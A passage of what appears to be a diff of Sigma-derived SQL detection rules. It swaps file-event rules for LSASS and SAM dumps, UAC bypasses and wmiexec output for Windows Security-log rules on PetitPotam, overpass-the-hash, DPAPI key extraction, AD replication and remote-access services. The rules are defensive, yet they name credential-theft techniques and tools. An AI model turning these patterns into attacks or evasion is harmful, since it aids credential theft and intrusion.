Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "author": "Mauricio Velazco, Michael Haag", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1187" ], "falsepositives": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" ], - "filename": "file_event_win_lsass_memory_dump_file_creation.yml" + "filename": "win_security_petitpotam_susp_tgt_request.yml" }, { - "title": "GatherNetworkInfo.VBS Reconnaissance Script Output", - "id": "f92a6f1e-a512-4a15-9735-da09e78d7273", - "status": "experimental", - "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Successful Overpass the Hash Attempt", + "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "status": "test", + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "tags": [ - "attack.discovery" + "attack.lateral_movement", + "attack.s0002", + "attack.t1550.002" ], "falsepositives": [ - "Unknown" + "Runas command-line tool using /netonly parameter" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Hotfixinfo.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\netiostate.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sysportslog.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VmSwitchLog.evtx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" ], - "filename": "file_event_win_lolbin_gather_network_info_script_output.yml" + "filename": "win_security_overpass_the_hash.yml" }, { - "title": "Suspicious Screensaver Binary File Creation", - "id": "97aa2e88-555c-450d-85a6-229bcd87efb8", - "status": "experimental", - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "author": "frack113", + "title": "SCM Database Privileged Operation", + "id": "dae8171c-5ec6-4396-b210-8466585b53e9", + "status": "test", + "description": "Detects non-system users performing privileged operation os the SCM database", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1546.002" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Kindle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bin\\\\ccSvcHst.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\uwfservicingscr.scr' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4674' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'servicesactive' AND PrivilegeList = 'SeTakeOwnershipPrivilege') AND NOT (SubjectLogonId = '0x3e4' AND ProcessName LIKE '%:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\'))" ], - "filename": "file_event_win_creation_scr_binary_file.yml" + "filename": "win_security_scm_database_privileged_operation.yml" }, { - "title": "Wmiexec Default Output File", - "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", - "status": "experimental", - "description": "Detects the creation of the default output filename used by the wmiexec tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Kerberos Manipulation", + "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "status": "test", + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1047" + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Unlikely" + "Faulty legacy applications" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" ], - "filename": "file_event_win_wmiexec_default_filename.yml" + "filename": "win_security_susp_kerberos_manipulation.yml" }, { - "title": "Suspicious Binary Writes Via AnyDesk", - "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", - "status": "experimental", - "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sysmon Channel Reference Deletion", + "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "status": "test", + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" ], - "filename": "file_event_win_anydesk_writing_susp_binaries.yml" + "filename": "win_security_sysmon_channel_reference_deletion.yml" }, { - "title": "UAC Bypass Using .NET Code Profiler on MMC", - "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "title": "DPAPI Domain Backup Key Extraction", + "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", "status": "test", - "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" + "filename": "win_security_dpapi_domain_backupkey_extraction.yml" }, { - "title": "Potential Persistence Via Outlook Form", - "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "title": "RDP over Reverse SSH Tunnel WFP", + "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "status": "experimental", - "description": "Detects the creation of a new Outlook form which can contain malicious code", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.t1137.003" + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate use of outlook forms" + "Programs that connect locally to the RDP port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_office_outlook_newform.yml" + "filename": "win_security_rdp_reverse_tunnel.yml" }, { - "title": "Potential SAM Database Dump", - "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", - "status": "experimental", - "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", - "author": "Florian Roth (Nextron Systems)", + "title": "Active Directory Replication from Non Machine Account", + "id": "17d619c1-e020-4347-957e-1d1207455c93", + "status": "test", + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1003.002" - ], - "falsepositives": [ - "Rare cases of administrative activity" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\'))" + "attack.t1003.006" ], - "filename": "file_event_win_sam_dump.yml" - }, - { - "title": "ISO or Image Mount Indicator in Recent Files", - "id": "4358e5a5-7542-4dcb-b9f3-87667371839b", - "status": "test", - "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Cases in which a user mounts an image file for legitimate reasons" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.iso.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.img.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhd.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhdx.lnk' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_iso_file_recent.yml" + "filename": "win_security_ad_replication_non_machine_account.yml" }, { - "title": "Potential Binary Or Script Dropper Via PowerShell.EXE", - "id": "7047d730-036f-4f40-b9d8-1c63e36d5e62", + "title": "Suspicious Remote Logon with Explicit Credentials", + "id": "941e5c45-cda7-4864-8cea-bbb7458d194a", "status": "experimental", - "description": "Detects PowerShell creating a binary executable or script file.", - "author": "frack113", + "description": "Detects suspicious processes logging on with explicit credentials", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", "tags": [ - "attack.persistence" + "attack.t1078", + "attack.lateral_movement" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + "Administrators that use the RunAS command or scheduled tasks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\_\\_PSScriptPolicyTest\\_%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4648' AND (ProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\winrs.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')) AND NOT ((TargetServerName = 'localhost') OR (SubjectUserName LIKE '%$' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_powershell_drop_binary.yml" + "filename": "win_security_susp_logon_explicit_credentials.yml" }, { - "title": "Suspicious Process Writes Ntds.dit", - "id": "11b1ed55-154d-4e82-8ad7-83739298f720", + "title": "Remote Access Tool Services Have Been Installed - Security", + "id": "c8b00925-926c-47e3-beea-298fd563728e", "status": "experimental", - "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", + "author": "Connor Martin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.persistence", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "The rule doesn't look for anything suspicious so false positives are expected. If you use one of the tools mentioned, comment it out" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%SSUService%' ESCAPE '\\' OR ServiceFileName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceFileName LIKE '%Atera%' ESCAPE '\\' OR ServiceFileName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceFileName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceFileName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCService%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceFileName LIKE '%monblanking%' ESCAPE '\\' OR ServiceFileName LIKE '%RManService%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceFileName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceFileName LIKE '%vncserver%' ESCAPE '\\' OR ServiceFileName LIKE '%Parsec%' ESCAPE '\\' OR ServiceFileName LIKE '%chromoting%' ESCAPE '\\' OR ServiceFileName LIKE '%Zoho%' ESCAPE '\\' OR ServiceFileName LIKE '%jumpcloud%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_ntds_dit.yml" + "filename": "win_security_service_install_remote_access_software.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack - File", - "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "title": "HybridConnectionManager Service Installation", + "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "description": "Rule to detect the Hybrid Connection Manager service installation.", "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "win_security_hybridconnectionmgr_svc_installation.yml" }, { - "title": "UAC Bypass Using IEInstal - File", - "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "title": "PowerShell Scripts Installed as Services - Security", + "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_ieinstal.yml" + "filename": "win_security_powershell_script_installed_as_service.yml" }, { - "title": "Potential Persistence Via Microsoft Office Add-In", - "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", + "title": "Secure Deletion with SDelete", + "id": "39a80702-d7ca-4a83-b776-525b1f86a36d", "status": "test", - "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", - "author": "NVISO", + "description": "Detects renaming of file while deletion with SDelete tool.", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.impact", + "attack.defense_evasion", + "attack.t1070.004", + "attack.t1027.005", + "attack.t1485", + "attack.t1553.002", + "attack.s0195" ], "falsepositives": [ - "Legitimate add-ins" + "Legitimate usage of SDelete" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663', '4658') AND (ObjectName LIKE '%.AAA' ESCAPE '\\' OR ObjectName LIKE '%.ZZZ' ESCAPE '\\'))" ], - "filename": "file_event_win_office_addin_persistence.yml" + "filename": "win_security_susp_sdelete.yml" }, { - "title": "Legitimate Application Dropped Archive", - "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", + "title": "Invoke-Obfuscation CLIP+ Launcher - Security", + "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", "status": "experimental", - "description": "Detects programs on a Windows system that should not write an archive to disk", - "author": "frack113, Florian Roth", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_archive.yml" + "filename": "win_security_invoke_obfuscation_clip_services_security.yml" }, { - "title": "UEFI Persistence Via Wpbbin - FileCreation", - "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "status": "experimental", - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DCERPC SMB Spoolss Named Pipe", + "id": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", + "status": "test", + "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "author": "OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Domain Controllers acting as printer servers too? :)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss')" ], - "filename": "file_event_win_wpbbin_persistence.yml" + "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml" }, { - "title": "LSASS Process Dump Artefact In CrashDumps Folder", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", + "title": "CVE-2023-23397 Exploitation Attempt", + "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", "status": "experimental", - "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", - "author": "@pbssubhash", + "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", + "author": "Robert Lee @quantum_cookie", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.initial_access", + "cve.2023.23397" ], "falsepositives": [ - "Rare legitimate dump of the process by the operating system due to a crash of lsass" + "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND 